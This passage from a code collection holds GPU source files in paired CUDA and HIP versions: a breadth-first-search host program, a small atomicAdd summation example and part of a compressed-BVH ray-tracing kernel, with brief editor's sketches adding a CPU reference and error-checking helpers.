allocate device memory for result int* d_cost; hipMalloc( (void**) &d_cost, sizeof(int)*no_of_nodes); hipMemcpy( d_cost, h_cost, sizeof(int)*no_of_nodes, hipMemcpyHostToDevice) ; //make a bool to check if the execution is over bool *d_over; hipMalloc( (void**) &d_over, sizeof(bool)); printf("Copied Everything to GPU memory\n"); // setup execution parameters dim3 grid( num_of_blocks, 1, 1); dim3 threads( num_of_threads_per_block, 1, 1); int k=0; printf("Start traversing the tree\n"); bool stop; //Call the Kernel untill all the elements of Frontier are not false do { //if no thread changes this value then the loop stops stop=false; hipMemcpy( d_over, &stop, sizeof(bool), hipMemcpyHostToDevice) ; hipLaunchKernelGGL(( Kernel), dim3(grid), dim3(threads), 0 , 0, d_graph_nodes, d_graph_edges, d_graph_mask, d_updating_graph_mask, d_graph_visited, d_cost, no_of_nodes); // check if kernel execution generated and error hipLaunchKernelGGL(( Kernel2), dim3(grid), dim3(threads), 0 , 0, d_graph_mask, d_updating_graph_mask, d_graph_visited, d_over, no_of_nodes); // check if kernel execution generated and error hipMemcpy( &stop, d_over, sizeof(bool), hipMemcpyDeviceToHost) ; k++; } while(stop); printf("Kernel Executed %d times\n",k); // copy result from device to host hipMemcpy( h_cost, d_cost, sizeof(int)*no_of_nodes, hipMemcpyDeviceToHost) ; //Store the result into a file FILE *fpo = fopen("result.txt","w"); for(int i=0;i<no_of_nodes;i++) fprintf(fpo,"%d) cost:%d\n",i,h_cost[i]); fclose(fpo); printf("Result stored in result.txt\n"); // cleanup memory free( h_graph_nodes); free( h_graph_edges); free( h_graph_mask); free( h_updating_graph_mask); free( h_graph_visited); free( h_cost); hipFree(d_graph_nodes); hipFree(d_graph_edges); hipFree(d_graph_mask); hipFree(d_updating_graph_mask); hipFree(d_graph_visited); hipFree(d_cost); }
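The host code above iterates two kernels until no vertex is added to the frontier: the first expands the current frontier and marks newly reached vertices in the updating mask, and the second promotes those marks into the next frontier and raises the continue flag. Because kernel.cu and kernel2.cu are not included in this file, the sketch below is a CPU reference of that two-phase sweep over the same Node/edge layout, following the standard Rodinia BFS scheme as an assumption about the kernel bodies; the tiny hard-coded graph is illustrative data, not the program's input format.

// bfs_frontier_sketch.cpp -- CPU reference of the two-phase frontier sweep; illustrative only.
#include <cstdio>
#include <vector>

struct Node { int starting; int no_of_edges; };

int main() {
    // Per-node offset and degree into a flat edge list, mirroring the file's layout (assumed data).
    std::vector<Node> nodes = {{0, 2}, {2, 1}, {3, 1}, {4, 0}};
    std::vector<int>  edges = {1, 2, 3, 3};
    int n = (int) nodes.size();

    std::vector<bool> mask(n, false), updating(n, false), visited(n, false);
    std::vector<int>  cost(n, -1);
    int source = 0;
    mask[source] = visited[source] = true;
    cost[source] = 0;

    bool stop;
    do {
        stop = false;
        // Phase 1 (first kernel): expand the current frontier into 'updating'.
        for (int tid = 0; tid < n; ++tid) {
            if (!mask[tid]) continue;
            mask[tid] = false;
            for (int e = nodes[tid].starting; e < nodes[tid].starting + nodes[tid].no_of_edges; ++e) {
                int id = edges[e];
                if (!visited[id]) { cost[id] = cost[tid] + 1; updating[id] = true; }
            }
        }
        // Phase 2 (second kernel): commit 'updating' into the new frontier and set the flag.
        for (int tid = 0; tid < n; ++tid) {
            if (!updating[tid]) continue;
            mask[tid] = visited[tid] = true;
            updating[tid] = false;
            stop = true;
        }
    } while (stop);

    for (int i = 0; i < n; ++i) printf("%d) cost:%d\n", i, cost[i]);
    return 0;
}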
819f92405be37a2e7cb4a36b3065e009e44af990.cu
/*********************************************************************************** Implementing Breadth first search on CUDA using algorithm given in HiPC'07 paper "Accelerating Large Graph Algorithms on the GPU using CUDA" Copyright (c) 2008 International Institute of Information Technology - Hyderabad. All rights reserved. Permission to use, copy, modify and distribute this software and its documentation for educational purpose is hereby granted without fee, provided that the above copyright notice and this permission notice appear in all copies of this software and that you do not sell the software. THE SOFTWARE IS PROVIDED "AS IS" AND WITHOUT WARRANTY OF ANY KIND,EXPRESS, IMPLIED OR OTHERWISE. Created by Pawan Harish. ************************************************************************************/ #include <stdlib.h> #include <stdio.h> #include <string.h> #include <math.h> #include <cuda.h> #define MAX_THREADS_PER_BLOCK 512 int no_of_nodes; int edge_list_size; FILE *fp; //Structure to hold a node information struct Node { int starting; int no_of_edges; }; #include <kernel.cu> #include <kernel2.cu> void BFSGraph(int argc, char** argv); //////////////////////////////////////////////////////////////////////////////// // Main Program //////////////////////////////////////////////////////////////////////////////// int main( int argc, char** argv) { no_of_nodes=0; edge_list_size=0; BFSGraph( argc, argv); } void Usage(int argc, char**argv) { fprintf(stderr,"Usage: %s <input_file>\n", argv[0]); } //////////////////////////////////////////////////////////////////////////////// //Apply BFS on a Graph using CUDA //////////////////////////////////////////////////////////////////////////////// void BFSGraph( int argc, char** argv) { char *input_f; if(argc!=2) { Usage(argc, argv); exit(0); } input_f = argv[1]; printf("Reading File\n"); //Read in Graph from a file fp = fopen(input_f,"r"); if(!fp) { printf("Error Reading graph file\n"); return; } int source = 0; fscanf(fp,"%d",&no_of_nodes); int num_of_blocks = 1; int num_of_threads_per_block = no_of_nodes; //Make execution Parameters according to the number of nodes //Distribute threads across multiple Blocks if necessary if(no_of_nodes>MAX_THREADS_PER_BLOCK) { num_of_blocks = (int)ceil(no_of_nodes/(double)MAX_THREADS_PER_BLOCK); num_of_threads_per_block = MAX_THREADS_PER_BLOCK; } // allocate host memory Node* h_graph_nodes = (Node*) malloc(sizeof(Node)*no_of_nodes); bool *h_graph_mask = (bool*) malloc(sizeof(bool)*no_of_nodes); bool *h_updating_graph_mask = (bool*) malloc(sizeof(bool)*no_of_nodes); bool *h_graph_visited = (bool*) malloc(sizeof(bool)*no_of_nodes); int start, edgeno; // initalize the memory for( unsigned int i = 0; i < no_of_nodes; i++) { fscanf(fp,"%d %d",&start,&edgeno); h_graph_nodes[i].starting = start; h_graph_nodes[i].no_of_edges = edgeno; h_graph_mask[i]=false; h_updating_graph_mask[i]=false; h_graph_visited[i]=false; } //read the source node from the file fscanf(fp,"%d",&source); source=0; //set the source node as true in the mask h_graph_mask[source]=true; h_graph_visited[source]=true; fscanf(fp,"%d",&edge_list_size); int id,cost; int* h_graph_edges = (int*) malloc(sizeof(int)*edge_list_size); for(int i=0; i < edge_list_size ; i++) { fscanf(fp,"%d",&id); fscanf(fp,"%d",&cost); h_graph_edges[i] = id; } if(fp) { fclose(fp); } printf("Read File\n"); //Copy the Node list to device memory Node* d_graph_nodes; cudaMalloc( (void**) &d_graph_nodes, sizeof(Node)*no_of_nodes) ; cudaMemcpy( d_graph_nodes, h_graph_nodes, 
sizeof(Node)*no_of_nodes, cudaMemcpyHostToDevice) ; //Copy the Edge List to device Memory int* d_graph_edges; cudaMalloc( (void**) &d_graph_edges, sizeof(int)*edge_list_size) ; cudaMemcpy( d_graph_edges, h_graph_edges, sizeof(int)*edge_list_size, cudaMemcpyHostToDevice) ; //Copy the Mask to device memory bool* d_graph_mask; cudaMalloc( (void**) &d_graph_mask, sizeof(bool)*no_of_nodes) ; cudaMemcpy( d_graph_mask, h_graph_mask, sizeof(bool)*no_of_nodes, cudaMemcpyHostToDevice) ; bool* d_updating_graph_mask; cudaMalloc( (void**) &d_updating_graph_mask, sizeof(bool)*no_of_nodes) ; cudaMemcpy( d_updating_graph_mask, h_updating_graph_mask, sizeof(bool)*no_of_nodes, cudaMemcpyHostToDevice) ; //Copy the Visited nodes array to device memory bool* d_graph_visited; cudaMalloc( (void**) &d_graph_visited, sizeof(bool)*no_of_nodes) ; cudaMemcpy( d_graph_visited, h_graph_visited, sizeof(bool)*no_of_nodes, cudaMemcpyHostToDevice) ; // allocate mem for the result on host side int* h_cost = (int*) malloc( sizeof(int)*no_of_nodes); for(int i=0;i<no_of_nodes;i++) { h_cost[i]=-1; } h_cost[source]=0; // allocate device memory for result int* d_cost; cudaMalloc( (void**) &d_cost, sizeof(int)*no_of_nodes); cudaMemcpy( d_cost, h_cost, sizeof(int)*no_of_nodes, cudaMemcpyHostToDevice) ; //make a bool to check if the execution is over bool *d_over; cudaMalloc( (void**) &d_over, sizeof(bool)); printf("Copied Everything to GPU memory\n"); // setup execution parameters dim3 grid( num_of_blocks, 1, 1); dim3 threads( num_of_threads_per_block, 1, 1); int k=0; printf("Start traversing the tree\n"); bool stop; //Call the Kernel untill all the elements of Frontier are not false do { //if no thread changes this value then the loop stops stop=false; cudaMemcpy( d_over, &stop, sizeof(bool), cudaMemcpyHostToDevice) ; Kernel<<< grid, threads, 0 >>>( d_graph_nodes, d_graph_edges, d_graph_mask, d_updating_graph_mask, d_graph_visited, d_cost, no_of_nodes); // check if kernel execution generated and error Kernel2<<< grid, threads, 0 >>>( d_graph_mask, d_updating_graph_mask, d_graph_visited, d_over, no_of_nodes); // check if kernel execution generated and error cudaMemcpy( &stop, d_over, sizeof(bool), cudaMemcpyDeviceToHost) ; k++; } while(stop); printf("Kernel Executed %d times\n",k); // copy result from device to host cudaMemcpy( h_cost, d_cost, sizeof(int)*no_of_nodes, cudaMemcpyDeviceToHost) ; //Store the result into a file FILE *fpo = fopen("result.txt","w"); for(int i=0;i<no_of_nodes;i++) fprintf(fpo,"%d) cost:%d\n",i,h_cost[i]); fclose(fpo); printf("Result stored in result.txt\n"); // cleanup memory free( h_graph_nodes); free( h_graph_edges); free( h_graph_mask); free( h_updating_graph_mask); free( h_graph_visited); free( h_cost); cudaFree(d_graph_nodes); cudaFree(d_graph_edges); cudaFree(d_graph_mask); cudaFree(d_updating_graph_mask); cudaFree(d_graph_visited); cudaFree(d_cost); }
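/*
 * Editor's sketch (illustration only): both versions of BFSGraph leave the
 * comment "check if kernel execution generated and error" after each launch
 * without performing any check. One minimal way to do that check, assuming a
 * CUDA build; CHECK_CUDA is a hypothetical helper macro introduced here, not
 * something defined by the original sources.
 */
#include <cstdio>
#include <cstdlib>
#include <cuda_runtime.h>

#define CHECK_CUDA(call)                                                    \
    do {                                                                    \
        cudaError_t err_ = (call);                                          \
        if (err_ != cudaSuccess) {                                          \
            fprintf(stderr, "CUDA error '%s' at %s:%d\n",                   \
                    cudaGetErrorString(err_), __FILE__, __LINE__);          \
            exit(EXIT_FAILURE);                                             \
        }                                                                   \
    } while (0)

/*
 * Usage inside the traversal loop:
 *   Kernel<<<grid, threads, 0>>>(...);
 *   CHECK_CUDA(cudaGetLastError());       // reports launch-configuration errors
 *   CHECK_CUDA(cudaDeviceSynchronize());  // reports asynchronous execution errors
 */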
185746bb47a5b3ab47b40f9647d15c47e1a37847.hip
// !!! This is a file automatically generated by hipify!!! #include <stdio.h> #include <hip/hip_runtime.h> #include <hip/hip_runtime.h> #include <stdlib.h> #define N 256 __global__ void add(int *a, int *b, int* d) { int tx = threadIdx.x, ty = threadIdx.y; int bidx = blockIdx.x, bidy = blockIdx.y; int bx = blockDim.x, by = blockDim.y; int gy = gridDim.y; int bid = bidx*gy + bidy; int tid = bid*bx*by + tx*by + ty; int c = a[tid] + b[tid]; atomicAdd(d, c); } void print_five(int* a, int* b){ int r = 35; for(int i=0; i<10; ++i){ r += i; printf("%d %d\n", a[r], b[r]); } } void random_ints(int *a, int n){ int i; for (i = 0; i < n; ++i) a[i] = rand() %10; } int main(void) { int *a, *b, *d; // host copies of a, b, c int *d_a, *d_b, *d_d; // device copies of a, b, c int size = N * sizeof(int), s = sizeof(int); // Alloc space for device copies of a, b, c hipMalloc((void **)&d_a, size); hipMalloc((void **)&d_b, size); hipMalloc((void **)&d_d, s); // Alloc space for host copies of a, b, c and setup input values a = (int *)malloc(size); random_ints(a, N); b = (int *)malloc(size); random_ints(b, N); d = (int *)malloc(s); *d = 0; hipMemcpy(d_a, a, size, hipMemcpyHostToDevice); hipMemcpy(d_b, b, size, hipMemcpyHostToDevice); hipMemcpy(d_d, d, s, hipMemcpyHostToDevice); // Launch add() kernel on GPU with N blocks dim3 thread(4,4),block(4, 4); hipLaunchKernelGGL(( add), dim3(block), dim3(thread), 0, 0, d_a, d_b, d_d); // Copy result back to host hipMemcpy(d, d_d, s, hipMemcpyDeviceToHost); print_five(a,b); printf("%d\n",*d); // Cleanup free(a); free(b); free(d); hipFree(d_a); hipFree(d_b); hipFree(d_d); return 0; }
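/*
 * Editor's sketch (illustration only, not part of the original file): a plain
 * host-side replica of the index arithmetic in add() above, checked for the
 * exact launch used there, dim3 thread(4,4) and block(4,4). With a 4x4 grid of
 * 4x4 blocks, tid = bid*bx*by + tx*by + ty covers 0..255 exactly once, which
 * is what lets the kernel read a[tid] and b[tid] for N = 256.
 */
#include <assert.h>

static int flatten(int bidx, int bidy, int tx, int ty,
                   int bx, int by, int gy)
{
    int bid = bidx * gy + bidy;           /* linear block id, as in the kernel */
    return bid * bx * by + tx * by + ty;  /* linear thread id, as in the kernel */
}

static void check_index_coverage(void)
{
    int seen[256] = {0};
    for (int bidx = 0; bidx < 4; ++bidx)
        for (int bidy = 0; bidy < 4; ++bidy)
            for (int tx = 0; tx < 4; ++tx)
                for (int ty = 0; ty < 4; ++ty)
                    seen[flatten(bidx, bidy, tx, ty, 4, 4, 4)]++;
    for (int i = 0; i < 256; ++i)
        assert(seen[i] == 1);             /* every element index hit exactly once */
}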
185746bb47a5b3ab47b40f9647d15c47e1a37847.cu
#include <stdio.h> #include <cuda_runtime.h> #include <cuda.h> #include <stdlib.h> #define N 256 __global__ void add(int *a, int *b, int* d) { int tx = threadIdx.x, ty = threadIdx.y; int bidx = blockIdx.x, bidy = blockIdx.y; int bx = blockDim.x, by = blockDim.y; int gy = gridDim.y; int bid = bidx*gy + bidy; int tid = bid*bx*by + tx*by + ty; int c = a[tid] + b[tid]; atomicAdd(d, c); } void print_five(int* a, int* b){ int r = 35; for(int i=0; i<10; ++i){ r += i; printf("%d %d\n", a[r], b[r]); } } void random_ints(int *a, int n){ int i; for (i = 0; i < n; ++i) a[i] = rand() %10; } int main(void) { int *a, *b, *d; // host copies of a, b, c int *d_a, *d_b, *d_d; // device copies of a, b, c int size = N * sizeof(int), s = sizeof(int); // Alloc space for device copies of a, b, c cudaMalloc((void **)&d_a, size); cudaMalloc((void **)&d_b, size); cudaMalloc((void **)&d_d, s); // Alloc space for host copies of a, b, c and setup input values a = (int *)malloc(size); random_ints(a, N); b = (int *)malloc(size); random_ints(b, N); d = (int *)malloc(s); *d = 0; cudaMemcpy(d_a, a, size, cudaMemcpyHostToDevice); cudaMemcpy(d_b, b, size, cudaMemcpyHostToDevice); cudaMemcpy(d_d, d, s, cudaMemcpyHostToDevice); // Launch add() kernel on GPU with N blocks dim3 thread(4,4),block(4, 4); add<<<block, thread>>>(d_a, d_b, d_d); // Copy result back to host cudaMemcpy(d, d_d, s, cudaMemcpyDeviceToHost); print_five(a,b); printf("%d\n",*d); // Cleanup free(a); free(b); free(d); cudaFree(d_a); cudaFree(d_b); cudaFree(d_d); return 0; }
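/*
 * Editor's sketch (illustration only): the kernel above reduces a[i] + b[i]
 * into the single integer *d with atomicAdd, but main() only prints the
 * result. A serial reference sum makes the output checkable; reference_sum
 * is a helper introduced here, not part of the original file.
 */
#include <stdio.h>

static int reference_sum(const int *a, const int *b, int n)
{
    /* Serial equivalent of what add<<<block, thread>>> accumulates into d. */
    int s = 0;
    for (int i = 0; i < n; ++i)
        s += a[i] + b[i];
    return s;
}

/*
 * Usage after copying d back to the host:
 *   int expected = reference_sum(a, b, N);
 *   printf("%s (expected %d, got %d)\n",
 *          expected == *d ? "OK" : "MISMATCH", expected, *d);
 */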
7508b6a3d70a35bdba48ac9621a59b73cf6059e9.hip
// !!! This is a file automatically generated by hipify!!! #include <hip/hip_runtime_api.h> #include "helper_math.h" #include "FastDeviceMinMax.h" #include "Logger.h" #include "CUDAAssert.h" __device__ unsigned __bfind(unsigned i) { unsigned b; asm volatile("bfind.u32 %0, %1; " : "=r"(b) : "r"(i)); return b; } __device__ __inline__ uint sign_extend_s8x4(uint i) { uint v; asm("prmt.b32 %0, %1, 0x0, 0x0000BA98;" : "=r"(v) : "r"(i)); return v; } __device__ __inline__ uint extract_byte(uint i, uint n) { return (i >> (n * 8)) & 0xFF; } __device__ const float4* BVHTreeNodes; __device__ const float4* TriangleWoopCoordinates; __device__ const int* MappingFromTriangleAddressToIndex; #define DYNAMIC_FETCH 1 #define TRIANGLE_POSTPONING 1 #define STACK_POP(X) { --stackPtr; if (stackPtr < SM_STACK_SIZE) X = traversalStackSM[threadIdx.x][threadIdx.y][stackPtr]; else X = traversalStack[stackPtr - SM_STACK_SIZE]; } #define STACK_PUSH(X) { if (stackPtr < SM_STACK_SIZE) traversalStackSM[threadIdx.x][threadIdx.y][stackPtr] = X; else traversalStack[stackPtr - SM_STACK_SIZE] = X; stackPtr++; } __global__ void rtTraceCWBVHDynamicFetch( Ray* rayBuffer, Hit* rayResultBuffer, int rayCount, int* finishedRayCount ) { const float ooeps = exp2f(-80.0f); const int STACK_SIZE = 32; uint2 traversalStack[STACK_SIZE]; const int SM_STACK_SIZE = 8; // Slightly smaller stack size than the paper (12), as this seems faster on my GTX1080 __shared__ uint2 traversalStackSM[32][2][SM_STACK_SIZE]; int rayidx; float3 orig, dir; float tmin, tmax; float idirx, idiry, idirz; uint octinv; uint2 nodeGroup = make_uint2(0); uint2 triangleGroup = make_uint2(0); char stackPtr = 0; int hitAddr = -1; float2 triangleuv; __shared__ int nextRayArray[2]; const float4* localBVHTreeNodes = BVHTreeNodes; const float4* localTriangleWoopCoordinates = TriangleWoopCoordinates; do { int& rayBase = nextRayArray[threadIdx.y]; bool terminated = stackPtr == 0 && nodeGroup.y <= 0x00FFFFFF; const unsigned int maskTerminated = __ballot_sync(__activemask(), terminated); const int numTerminated = __popc(maskTerminated); const int idxTerminated = __popc(maskTerminated & ((1u << threadIdx.x) - 1)); if (terminated) { if (idxTerminated == 0) rayBase = atomicAdd(finishedRayCount, numTerminated); rayidx = rayBase + idxTerminated; if (rayidx >= rayCount) break; orig = make_float3(rayBuffer[rayidx].origin_tmin); dir = make_float3(rayBuffer[rayidx].dir_tmax); tmin = rayBuffer[rayidx].origin_tmin.w; tmax = rayBuffer[rayidx].dir_tmax.w; idirx = 1.0f / (fabsf(dir.x) > ooeps ? dir.x : copysignf(ooeps, dir.x)); // inverse ray direction idiry = 1.0f / (fabsf(dir.y) > ooeps ? dir.y : copysignf(ooeps, dir.y)); // inverse ray direction idirz = 1.0f / (fabsf(dir.z) > ooeps ? dir.z : copysignf(ooeps, dir.z)); // inverse ray direction octinv = ((dir.x < 0 ? 1 : 0) << 2) | ((dir.y < 0 ? 1 : 0) << 1) | ((dir.z < 0 ? 
1 : 0) << 0); octinv = 7 - octinv; nodeGroup = make_uint2(0, 0b10000000000000000000000000000000); triangleGroup = make_uint2(0); stackPtr = 0; hitAddr = -1; } #if DYNAMIC_FETCH int lostLoopIterations = 0; #endif do { if (nodeGroup.y > 0x00FFFFFF) { const unsigned int hits = nodeGroup.y; const unsigned int imask = nodeGroup.y; const unsigned int child_bit_index = __bfind(hits); const unsigned int child_node_base_index = nodeGroup.x; nodeGroup.y &= ~(1 << child_bit_index); if (nodeGroup.y > 0x00FFFFFF) { STACK_PUSH(nodeGroup); } { const unsigned int slot_index = (child_bit_index - 24) ^ octinv; const unsigned int octinv4 = octinv * 0x01010101u; const unsigned int relative_index = __popc(imask & ~(0xFFFFFFFF << slot_index)); const unsigned int child_node_index = child_node_base_index + relative_index; float4 n0, n1, n2, n3, n4; n0 = __ldg(localBVHTreeNodes + child_node_index * 5 + 0); n1 = __ldg(localBVHTreeNodes + child_node_index * 5 + 1); n2 = __ldg(localBVHTreeNodes + child_node_index * 5 + 2); n3 = __ldg(localBVHTreeNodes + child_node_index * 5 + 3); n4 = __ldg(localBVHTreeNodes + child_node_index * 5 + 4); float3 p = make_float3(n0); int3 e; e.x = *((char*)&n0.w + 0); e.y = *((char*)&n0.w + 1); e.z = *((char*)&n0.w + 2); nodeGroup.x = float_as_uint(n1.x); triangleGroup.x = float_as_uint(n1.y); triangleGroup.y = 0; unsigned int hitmask = 0; const float adjusted_idirx = uint_as_float((e.x + 127) << 23) * idirx; const float adjusted_idiry = uint_as_float((e.y + 127) << 23) * idiry; const float adjusted_idirz = uint_as_float((e.z + 127) << 23) * idirz; const float origx = -(orig.x - p.x) * idirx; const float origy = -(orig.y - p.y) * idiry; const float origz = -(orig.z - p.z) * idirz; { // First 4 const unsigned int meta4 = float_as_uint(n1.z); const unsigned int is_inner4 = (meta4 & (meta4 << 1)) & 0x10101010; const unsigned int inner_mask4 = sign_extend_s8x4(is_inner4 << 3); const unsigned int bit_index4 = (meta4 ^ (octinv4 & inner_mask4)) & 0x1F1F1F1F; const unsigned int child_bits4 = (meta4 >> 5) & 0x07070707; // Potential micro-optimization: use PRMT to do the selection here, as described by the paper uint swizzledLox = (idirx < 0) ? float_as_uint(n3.z) : float_as_uint(n2.x); uint swizzledHix = (idirx < 0) ? float_as_uint(n2.x) : float_as_uint(n3.z); uint swizzledLoy = (idiry < 0) ? float_as_uint(n4.x) : float_as_uint(n2.z); uint swizzledHiy = (idiry < 0) ? float_as_uint(n2.z) : float_as_uint(n4.x); uint swizzledLoz = (idirz < 0) ? float_as_uint(n4.z) : float_as_uint(n3.x); uint swizzledHiz = (idirz < 0) ? 
float_as_uint(n3.x) : float_as_uint(n4.z); float tminx[4]; float tminy[4]; float tminz[4]; float tmaxx[4]; float tmaxy[4]; float tmaxz[4]; tminx[0] = ((swizzledLox >> 0) & 0xFF) * adjusted_idirx + origx; tminx[1] = ((swizzledLox >> 8) & 0xFF) * adjusted_idirx + origx; tminx[2] = ((swizzledLox >> 16) & 0xFF) * adjusted_idirx + origx; tminx[3] = ((swizzledLox >> 24) & 0xFF) * adjusted_idirx + origx; tminy[0] = ((swizzledLoy >> 0) & 0xFF) * adjusted_idiry + origy; tminy[1] = ((swizzledLoy >> 8) & 0xFF) * adjusted_idiry + origy; tminy[2] = ((swizzledLoy >> 16) & 0xFF) * adjusted_idiry + origy; tminy[3] = ((swizzledLoy >> 24) & 0xFF) * adjusted_idiry + origy; tminz[0] = ((swizzledLoz >> 0) & 0xFF) * adjusted_idirz + origz; tminz[1] = ((swizzledLoz >> 8) & 0xFF) * adjusted_idirz + origz; tminz[2] = ((swizzledLoz >> 16) & 0xFF) * adjusted_idirz + origz; tminz[3] = ((swizzledLoz >> 24) & 0xFF) * adjusted_idirz + origz; tmaxx[0] = ((swizzledHix >> 0) & 0xFF) * adjusted_idirx + origx; tmaxx[1] = ((swizzledHix >> 8) & 0xFF) * adjusted_idirx + origx; tmaxx[2] = ((swizzledHix >> 16) & 0xFF) * adjusted_idirx + origx; tmaxx[3] = ((swizzledHix >> 24) & 0xFF) * adjusted_idirx + origx; tmaxy[0] = ((swizzledHiy >> 0) & 0xFF) * adjusted_idiry + origy; tmaxy[1] = ((swizzledHiy >> 8) & 0xFF) * adjusted_idiry + origy; tmaxy[2] = ((swizzledHiy >> 16) & 0xFF) * adjusted_idiry + origy; tmaxy[3] = ((swizzledHiy >> 24) & 0xFF) * adjusted_idiry + origy; tmaxz[0] = ((swizzledHiz >> 0) & 0xFF) * adjusted_idirz + origz; tmaxz[1] = ((swizzledHiz >> 8) & 0xFF) * adjusted_idirz + origz; tmaxz[2] = ((swizzledHiz >> 16) & 0xFF) * adjusted_idirz + origz; tmaxz[3] = ((swizzledHiz >> 24) & 0xFF) * adjusted_idirz + origz; for (int childIndex = 0; childIndex < 4; childIndex++) { // Use VMIN, VMAX to compute the slabs const float cmin = fmaxf(fmax_fmax(tminx[childIndex], tminy[childIndex], tminz[childIndex]), tmin); const float cmax = fminf(fmin_fmin(tmaxx[childIndex], tmaxy[childIndex], tmaxz[childIndex]), tmax); bool intersected = cmin <= cmax; // Potential micro-optimization: use VSHL to implement this part, as described by the paper if (intersected) { const unsigned int child_bits = extract_byte(child_bits4, childIndex); const unsigned int bit_index = extract_byte(bit_index4, childIndex); hitmask |= child_bits << bit_index; } } } { // Second 4 const unsigned int meta4 = float_as_uint(n1.w); const unsigned int is_inner4 = (meta4 & (meta4 << 1)) & 0x10101010; const unsigned int inner_mask4 = sign_extend_s8x4(is_inner4 << 3); const unsigned int bit_index4 = (meta4 ^ (octinv4 & inner_mask4)) & 0x1F1F1F1F; const unsigned int child_bits4 = (meta4 >> 5) & 0x07070707; // Potential micro-optimization: use PRMT to do the selection here, as described by the paper uint swizzledLox = (idirx < 0) ? float_as_uint(n3.w) : float_as_uint(n2.y); uint swizzledHix = (idirx < 0) ? float_as_uint(n2.y) : float_as_uint(n3.w); uint swizzledLoy = (idiry < 0) ? float_as_uint(n4.y) : float_as_uint(n2.w); uint swizzledHiy = (idiry < 0) ? float_as_uint(n2.w) : float_as_uint(n4.y); uint swizzledLoz = (idirz < 0) ? float_as_uint(n4.w) : float_as_uint(n3.y); uint swizzledHiz = (idirz < 0) ? 
float_as_uint(n3.y) : float_as_uint(n4.w); float tminx[4]; float tminy[4]; float tminz[4]; float tmaxx[4]; float tmaxy[4]; float tmaxz[4]; tminx[0] = ((swizzledLox >> 0) & 0xFF) * adjusted_idirx + origx; tminx[1] = ((swizzledLox >> 8) & 0xFF) * adjusted_idirx + origx; tminx[2] = ((swizzledLox >> 16) & 0xFF) * adjusted_idirx + origx; tminx[3] = ((swizzledLox >> 24) & 0xFF) * adjusted_idirx + origx; tminy[0] = ((swizzledLoy >> 0) & 0xFF) * adjusted_idiry + origy; tminy[1] = ((swizzledLoy >> 8) & 0xFF) * adjusted_idiry + origy; tminy[2] = ((swizzledLoy >> 16) & 0xFF) * adjusted_idiry + origy; tminy[3] = ((swizzledLoy >> 24) & 0xFF) * adjusted_idiry + origy; tminz[0] = ((swizzledLoz >> 0) & 0xFF) * adjusted_idirz + origz; tminz[1] = ((swizzledLoz >> 8) & 0xFF) * adjusted_idirz + origz; tminz[2] = ((swizzledLoz >> 16) & 0xFF) * adjusted_idirz + origz; tminz[3] = ((swizzledLoz >> 24) & 0xFF) * adjusted_idirz + origz; tmaxx[0] = ((swizzledHix >> 0) & 0xFF) * adjusted_idirx + origx; tmaxx[1] = ((swizzledHix >> 8) & 0xFF) * adjusted_idirx + origx; tmaxx[2] = ((swizzledHix >> 16) & 0xFF) * adjusted_idirx + origx; tmaxx[3] = ((swizzledHix >> 24) & 0xFF) * adjusted_idirx + origx; tmaxy[0] = ((swizzledHiy >> 0) & 0xFF) * adjusted_idiry + origy; tmaxy[1] = ((swizzledHiy >> 8) & 0xFF) * adjusted_idiry + origy; tmaxy[2] = ((swizzledHiy >> 16) & 0xFF) * adjusted_idiry + origy; tmaxy[3] = ((swizzledHiy >> 24) & 0xFF) * adjusted_idiry + origy; tmaxz[0] = ((swizzledHiz >> 0) & 0xFF) * adjusted_idirz + origz; tmaxz[1] = ((swizzledHiz >> 8) & 0xFF) * adjusted_idirz + origz; tmaxz[2] = ((swizzledHiz >> 16) & 0xFF) * adjusted_idirz + origz; tmaxz[3] = ((swizzledHiz >> 24) & 0xFF) * adjusted_idirz + origz; for (int childIndex = 0; childIndex < 4; childIndex++) { // Use VMIN, VMAX to compute the slabs const float cmin = fmaxf(fmax_fmax(tminx[childIndex], tminy[childIndex], tminz[childIndex]), tmin); const float cmax = fminf(fmin_fmin(tmaxx[childIndex], tmaxy[childIndex], tmaxz[childIndex]), tmax); bool intersected = cmin <= cmax; // Potential micro-optimization: use VSHL to implement this part, as described by the paper if (intersected) { const unsigned int child_bits = extract_byte(child_bits4, childIndex); const unsigned int bit_index = extract_byte(bit_index4, childIndex); hitmask |= child_bits << bit_index; } } } nodeGroup.y = (hitmask & 0xFF000000) | (*((byte*)&n0.w + 3)); triangleGroup.y = hitmask & 0x00FFFFFF; } } else { triangleGroup = nodeGroup; nodeGroup = make_uint2(0); } #if TRIANGLE_POSTPONING const int totalThreads = __popc(__activemask()); #endif while (triangleGroup.y != 0) { #if TRIANGLE_POSTPONING const float Rt = 0.2; const int threshold = totalThreads * Rt; const int numActiveThreads = __popc(__activemask()); if (numActiveThreads < threshold) { STACK_PUSH(triangleGroup); break; } #endif int triangleIndex = __bfind(triangleGroup.y); int triAddr = triangleGroup.x * 3 + triangleIndex * 3; float4 v00 = __ldg(localTriangleWoopCoordinates + triAddr + 0); float4 v11 = __ldg(localTriangleWoopCoordinates + triAddr + 1); float4 v22 = __ldg(localTriangleWoopCoordinates + triAddr + 2); float Oz = v00.w - orig.x*v00.x - orig.y*v00.y - orig.z*v00.z; float invDz = 1.0f / (dir.x*v00.x + dir.y*v00.y + dir.z*v00.z); float t = Oz * invDz; float Ox = v11.w + orig.x*v11.x + orig.y*v11.y + orig.z*v11.z; float Dx = dir.x * v11.x + dir.y * v11.y + dir.z * v11.z; float u = Ox + t * Dx; float Oy = v22.w + orig.x*v22.x + orig.y*v22.y + orig.z*v22.z; float Dy = dir.x*v22.x + dir.y*v22.y + dir.z*v22.z; float v = Oy + t*Dy; 
